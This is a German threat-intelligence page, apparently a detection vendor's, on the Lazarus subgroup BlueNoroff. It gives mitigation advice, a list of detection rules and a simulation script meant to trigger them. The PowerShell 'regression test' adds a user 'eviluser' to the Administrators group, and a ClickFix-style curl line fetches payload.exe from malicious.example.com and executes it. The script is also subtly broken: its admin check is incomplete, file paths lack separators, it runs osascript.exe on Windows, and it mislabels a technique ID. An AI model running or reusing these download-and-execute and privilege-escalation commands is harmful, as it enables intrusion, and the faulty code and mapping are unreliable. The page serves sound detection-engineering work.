BlueNoroff-Gruppe: Der finanzielle Cyberkriminalitätsarm von Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
BlueNoroff ist eine finanziell orientierte Untergruppe innerhalb des Lazarus-Ökosystems, die sich auf Diebstähle mit hohem Wert gegen Banken, Kryptowährungsfirmen und breitere Web3-Ziele konzentriert. Das Handbuch der Gruppe umfasst SWIFT-fähigen Betrug, Watering-Hole-Kompromittierungen, Supply-Chain-Vergiftungen von Go-Paketen und macOS-Einbruchspfade, die um gefälschte „Bewerbungsgespräch“-Köder herum aufgebaut sind. Um Ausführung und Persistenz zu erreichen, kombiniert BlueNoroff einen modularen Rust/Go-Malware-Stack mit AppleScript-, VBScript- und Social-Engineering-Arbeitsabläufen, die darauf ausgelegt sind, Benutzerwarnungen zu umgehen und sich in legitime Entwicklungs- und Verwaltungsaktivitäten einzufügen.
Untersuchung
Der Bericht verfolgt die Entwicklung von BlueNoroff vom Banküberfall in Bangladesch 2016 bis zu neueren Aktivitäten in der Supply-Chain-Ära 2025 und hebt hervor, wie sich das Werkzeug und die Zielsetzung des Akteurs parallel zum Krypto-/Web3-Ökosystem erweitert haben. Forscher skizzieren Infrastrukturmuster und katalogisieren Malware-Komponenten wie GhostCall, GhostHire, RustBucket und GillyInjector. Die Untersuchung kartiert auch beobachtete Verhaltensweisen zu MITRE ATT&CK über Phasen wie Aufklärung und anfänglicher Zugriff, dann Ausführung, Persistenz und Anmeldeinformationsdiebstahl – und unterstreicht eine konsequente Betonung auf heimliche Stützpunkte, gestufte Nutzlastbereitstellung und diebstahlbereite Zugangspfade.
Abschwächung
Reduzieren Sie die Exposition durch eine straffere Supply-Chain-Hygiene: Validieren Sie Pakete, die aus öffentlichen Registern gezogen werden, erzwingen Sie das Festlegen und die Herkunftskontrollen und überprüfen Sie kontinuierlich Abhängigkeitsaktualisierungen auf unerwartete Änderungen von Wartungspersonen oder Code. Härten Sie auf macOS die LaunchAgent/LaunchDaemon-Verwaltung und überwachen Sie verdächtige Persistenzeinträge und unsignierte Werkzeuge. Blockieren Sie ähnlich aussehende Domains, die für Köderlieferung verwendet werden, erzwingen Sie MFA für privilegierte Identitäten und extern exponierte Dienste, und operationalisieren Sie Erkennungen für bekannte bösartige Skripte, Lader und Packtechniken, die mit dem Akteur in Verbindung stehen. Halten Sie Bedrohungsintelligenz-Updates häufig und verstärken Sie das Benutzertraining mit dem Fokus auf Spear-Phishing und „Personalvermittler/Bewerbungsgespräch“-Social-Engineering-Muster.
Reaktion
Wenn BlueNoroff-Indikatoren entdeckt werden, isolieren Sie betroffene Hosts und bewahren Sie wichtige Beweise auf, einschließlich vollständiger Befehlszeilen, Skriptinhalte und abgelegter Binärdateien oder Paket-Artefakte. Blockieren Sie identifizierte bösartige Domains und C2-IPs, und führen Sie dann Incident-Response-Playbooks aus, die auf Szenarien des Anmeldeinformationsdiebstahls und der Supply-Chain-Kompromittierung ausgerichtet sind. Implementieren oder optimieren Sie Erkennungen für AppleScript- und VBScript-Ausführungsketten sowie für verdächtige PowerShell-Muster, die im Bericht erwähnt werden, und erweitern Sie die Jagd, um zusätzliche Endpunkte zu identifizieren, die demselben Köder-, Abhängigkeits- oder Infrastrukturüberlappung ausgesetzt sind.
Angriffsfluss
Erkennungen
Mögliche Systemnetzwekkonfigurationsentdeckung (über cmdline)
Ansehen
Mögliche Remote-Systemerkennung oder Konnektivitätsprüfung (über cmdline)
Ansehen
Verdächtige Binärdatei/Skripte im Autostart-Standort (über file_event)
Ansehen
Mögliche Administrator-Konto- oder Gruppenermittlung (über cmdline)
Ansehen
IOCs (E-Mails) zur Erkennung: BlueNoroff Gruppe: Der Finanz-Cybercrime-Arm von Lazarus
Ansehen
Erkennung von bösartigem AppleScript und ClickFix-Befehlsausführung [Windows-Prozesserstellung]
Ansehen
Ermittlung lokaler und Domänenbenutzer über Net-Befehle [Windows Sysmon]
Ansehen
Erkennung von BlueNoroff PowerShell-Obfuskation und -Kodierung [Windows Powershell]
Ansehen
Simulation-Ausführung
Voraussetzung: Die Telemetrie- & Baseline-Pre-Flight-Überprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Kommandos und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffsnarrativ & Befehle:
- AppleScript-Ausführung (T1546.016) – Der Gegner legt ein bösartiges
payload.scptauf dem Endpunkt ab (z. B. über einen Phishing-Anhang). Mithilfe eines vorinstalliertenosascript.exe(gebündelt mit einem Drittanbietertool), starten sie das Skript, um eine PowerShell-Nutzlast auszuführen, die ein neues lokales Administratorkonto hinzufügt. - ClickFix-Zwischenablagenlieferung (T1204.004) – Der Angreifer kopiert einen gestalteten Befehl in die Zwischenablage, der
curlmit einem Zoom-ähnlichen Benutzeragenten aufruft, um eine Nutzlast der zweiten Stufe herunterzuladen, und führt diese dann sofort übercmd.exeaus. Der Befehl enthält auch einen Inlinepowershell.exe -cAufruf, um die Nutzlast im Speicher auszuführen.
- AppleScript-Ausführung (T1546.016) – Der Gegner legt ein bösartiges
-
Regression-Testskript: Das untenstehende Skript reproduziert beide Verhaltensweisen auf deterministische Weise.
#----- BEGIN REGRESSION TEST SCRIPT ----- # Stellen Sie sicher, dass wir mit administrativen Rechten arbeiten if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Führen Sie dieses Skript als Administrator aus." exit 1 } # 1. AppleScript-Ausführung über osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Führen Sie das AppleScript aus Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. ClickFix-Style-Zwischenablage-Lieferung $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Führen Sie über cmd.exe aus, um die Regelbedingung zu erfüllen Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Aufräumen: Artefakte entfernen Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Ende des Skripts #----- END REGRESSION TEST SCRIPT ----- -
Aufräumkommandos: Entfernen Sie alle verbleibenden Prozesse, Dateien und das Testbenutzerkonto.
# Stoppen Sie alle verbleibenden Prozesse (defensiv – normalerweise nicht erforderlich) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Temporäre Dateien löschen Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Entfernen Sie das Testadministrator-Konto, falls es erstellt wurde if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }